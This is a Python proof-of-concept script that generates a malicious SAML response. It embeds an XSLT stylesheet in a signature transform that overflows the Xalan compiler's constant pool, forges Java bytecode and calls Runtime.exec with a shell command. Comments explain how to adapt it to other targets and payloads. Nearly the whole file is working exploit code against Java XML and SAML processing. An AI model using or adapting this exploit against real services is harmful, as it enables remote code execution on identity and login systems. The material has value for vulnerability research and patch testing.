import string 
from xml.sax.saxutils import escape
import sys
import struct
import decimal

# Depending on the Xalan version, the generated java class
# will contain some fixed entries in the constant table.
# We also add the constants created by the fixed parts of our payload
# such as templates and the runtime/exec block.
fixed_consts = 223  + 26 - 2 + 31 + 1
# Number of fixed constants that will be added before or inline
# with our constants. The rest is added to the end of the globals table
early_consts = 190 + 31 + 1

# Our exploit requires that the (truncated) constant pool length is
# 0x703 so make sure we generate the right number of filler consts
c = 16771.0 - 8
assert(fixed_consts + (c*4) == 0x10703)


object_offset = 407 - 80 # Location 
payload_offset = 0x703 - early_consts # Location of our main payload (fake class header, methods, bytecode)


cmd = "sh -c {{touch,/tmp/test1234}}"


# Adapting this code to a different target version or payload
# 1. Ensure that constant_pool_count == 0x703 by changing c and adding/removing constants in the fixed payload part
# 2. Fix payload_offset so that the double payloads come right after the this_class header field
# 3. Fix object_offset so that the BasisLibrary class info is at constant pool entry 0x206 (or 517 )
# 4. Fix attribute size to ignore garbage at the end


# We use doubles for writing almost arbitrary 8-bytes blocks 
# to the class file. XML doesn't support scientific notation
# so we enforce 0.XXXX formatting 
ctx = decimal.Context()
ctx.prec = 20
def to_double(b):
    f = struct.unpack('>d', struct.pack('>Q', b))[0]
    d1 = ctx.create_decimal(repr(f))
    return format(d1, 'f')

# Iterator to yield a unique three letter string
def unique_strings():
    for a in string.ascii_letters:
        for b in string.ascii_letters:
            for c in string.ascii_letters:
                yield a+b+c

# Return a unique int that will get stored
# in the constant pool (== has to be bigger than MAX_SHORT)
def unique_number():
  if not hasattr(unique_number, "counter"):
     unique_number.counter = 133700 
  unique_number.counter += 1
  return unique_number.counter

# Xalan enforces a maximum length for the java method generated
# when compiling a xsl template. To avoid hitting this limit
# while still overflowing the constant pool, we generate
# 4 templates. Interestingly, the order of jitted template methods
# in the output class is non-deterministic so we need to make sure
# that the exploit works regardless of the order. 
def generate_template(count, strings, first):

    num = 0 
    def n(strings):
        nonlocal num
        num+=2 # 1 for the UTF-8 constant + 1 for the String constant
        return next(strings)

    # all the hardcoded payload constants are counted as part of fixed and early consts
    # as they will only show up once in the global table regardless of the number of templates
    ret = f"""<xsl:template name='{n(strings)}' match="/{n(strings)}">
    <ceil fillerElement='ceil' ceil='&lt;init&gt;' {n(strings)}='{n(strings)}' />
    <ceil {n(strings)}='{cmd}' /> <ceil """
    num+=1 # additional constant for the template 

    while num < object_offset:
        ret += f"{n(strings)}='{n(strings)}' "
    
    ret += "/>"

    assert(num==object_offset)


    # The weird getChildren, SourceFile ... elements are an easy trick to add a single 
    # Constant into the pool. These strings already exist as UTF-8 constants because they
    # are used for method or attribute names, but they don't exist as String object. So
    # using them as node names generates a single new String constant in the pool. 
    ret+="""
    <getChildren />
    <xsl:variable name="rtobject" select="runtime:getRuntime()"/>
    <xsl:variable name="cmd">x</xsl:variable>
    <xsl:variable name="process" select="runtime:exec($rtobject,$cmd)"/>
    <xsl:variable name="obj" select="object:tokenize(.)"/>
    <xsl:value-of select="$process"/>
    <xsl:value-of select="$obj"/>
    <fillerElement />
    <SourceFile />
    """

    ret += f"<xsl:value-of select='ceiling({unique_number()})'/>"
    num += 1
    ret += f"<xsl:value-of select='ceiling({unique_number()})'/>"
    num += 1

    ret += f"<{n(strings)} "

    while num < payload_offset-4:
        ret += f"{n(strings)}='{n(strings)}' "

    ret += "/>"

    while num < payload_offset -2:
        ret += f"<xsl:value-of select='ceiling({unique_number()})'/>"
        num += 1

    ret += f"<{n(strings)} />"

    assert(num==payload_offset)
    
    # We use doubles to write almost completely controlled 8-byte values separated by a 6 type tag to the class file"
    # 6XXXXXXXX6YYYYYYYY6ZZZZZZZZ
    def w(n):
        nonlocal num
        if first:
            num+=2
        return f"""
        <xsl:value-of select='ceiling({to_double(n)})'/>
        """
    ret+= w(0x0006000000000002)
    ret+= w(0x0100490044000103)
    ret+= w(0x0000000500000101)
    ret+= w(0x00010043001E0003) # Method Indexes and attributes count
    ret+= w(0x0000000004AABBCC)
    ret+= w(0x00520000008E00FF) # Code Attribute Index, Length and max_stack
    ret+= w(0x0000000082000000) # LSB of max_locals, code_length, code
    ret+= w(0x00b801dc00000000) # invokestatic  #476      // Method java/lang/Runtime.getRuntime:()Ljava/lang/Runtime;
    ret+= w(0x0057130080000000) # ldc_w # 180
    ret+= w(0x0057b601f9000000) # pop; invokevirtual #505 
    ret+= w(0x0001bfa700000000)
    ret+= w(0x0000000000444449)
    ret+= w(0x000000000044444A)
    ret+= w(0x000000000044444B)
    ret+= w(0x000000000044444C)
    ret+= w(0x000000000044444D)
    ret+= w(0x000000000044444E)
    ret+= w(0x000000000044444F)
    ret+= w(0x0000000000444450)
    ret+= w(0x0000000000444451)
    ret+= w(0x0000000000444452)
    ret+= w(0x0000000000490000)
    ret+= w(0x0B00000000444454)

    ret += f"""<{n(strings)} """

    for _ in range(0, 85):
        ret += f"{n(strings)}='{n(strings)}' "

    ret += "/>"

    ret+= w(0x000106000007e1ec)

    ret += f"""<{n(strings)} """

    while num < count-4:
        ret += f"{n(strings)}='{n(strings)}' "

    ret += "/>"

    while num < count:
        ret += f"<xsl:value-of select='ceiling({unique_number()})'/>"
        num+=1

    assert(num==count)
    ret+="""</xsl:template>"""
    return ret+"\n"


strings_iter = unique_strings()


xml = """
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0" 
xmlns:runtime="http://xml.apache.org/xalan/java/java.lang.Runtime"
	xmlns:process="http://xml.apache.org/xalan/java/java.lang.Process"
	xmlns:object="http://xml.apache.org/xalan/java/com.sun.org.apache.xalan.internal.lib.ExsltStrings">
"""
xml+=generate_template(c,strings_iter, True)
xml+=generate_template(c,strings_iter, False)
xml+=generate_template(c,strings_iter, False)
xml+=generate_template(c,strings_iter, False)
xml+="""</xsl:stylesheet>"""

saml = f"""<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
    xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_8e8dc5f69a98cc4c1ff3427e5ce34606fd672f91e6" Version="2.0" IssueInstant="2014-07-17T01:01:48Z" Destination="http://sp.example.com/demo1/index.php?acs" InResponseTo="ONELOGIN_4fee3b046395c4e751011e97f8900b5273d56685">
    <saml:Issuer>http://idp.example.com/metadata.php</saml:Issuer>
    <samlp:Status>
        <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
    </samlp:Status>
    <saml:Assertion xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xmlns:xs="http://www.w3.org/2001/XMLSchema" ID="pfx82449dd7-bfea-6f3c-1090-4454de72f4c0" Version="2.0" IssueInstant="2014-07-17T01:01:48Z">
        <saml:Issuer>http://idp.example.com/metadata.php</saml:Issuer>
        <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
            <ds:SignedInfo>
                <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
                <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
                <ds:Reference URI="#pfx82449dd7-bfea-6f3c-1090-4454de72f4c0">
                    <ds:Transforms>
                        <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
                        <ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">
                        {xml}
                                 </ds:Transform>
                    </ds:Transforms>
                    <ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/>
                    <ds:DigestValue></ds:DigestValue>
                </ds:Reference>
            </ds:SignedInfo>
            <ds:SignatureValue></ds:SignatureValue>
            <ds:KeyInfo>
                <ds:KeyName/>
                <ds:KeyValue/>
            </ds:KeyInfo>
        </ds:Signature>
        <saml:Subject>
            <saml:NameID SPNameQualifier="http://sp.example.com/demo1/metadata.php" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient">_ce3d2948b4cf20146dee0a0b3dd6f69b6cf86f62d7</saml:NameID>
            <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
                <saml:SubjectConfirmationData NotOnOrAfter="2024-01-18T06:21:48Z" Recipient="http://sp.example.com/demo1/index.php?acs" InResponseTo="ONELOGIN_4fee3b046395c4e751011e97f8900b5273d56685"/>
            </saml:SubjectConfirmation>
        </saml:Subject>
        <saml:Conditions NotBefore="2014-07-17T01:01:18Z" NotOnOrAfter="2024-01-18T06:21:48Z">
            <saml:AudienceRestriction>
                <saml:Audience>http://sp.example.com/demo1/metadata.php</saml:Audience>
            </saml:AudienceRestriction>
        </saml:Conditions>
        <saml:AuthnStatement AuthnInstant="2014-07-17T01:01:48Z" SessionNotOnOrAfter="2024-07-17T09:01:48Z" SessionIndex="_be9967abd904ddcae3c0eb4189adbe3f71e327cf93">
            <saml:AuthnContext>
                <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef>
            </saml:AuthnContext>
        </saml:AuthnStatement>
        <saml:AttributeStatement>
            <saml:Attribute Name="uid" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
                <saml:AttributeValue xsi:type="xs:string">test</saml:AttributeValue>
            </saml:Attribute>
            <saml:Attribute Name="mail" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
                <saml:AttributeValue xsi:type="xs:string">test@example.com</saml:AttributeValue>
            </saml:Attribute>
        </saml:AttributeStatement>
    </saml:Assertion>
</samlp:Response>
"""

print(saml)
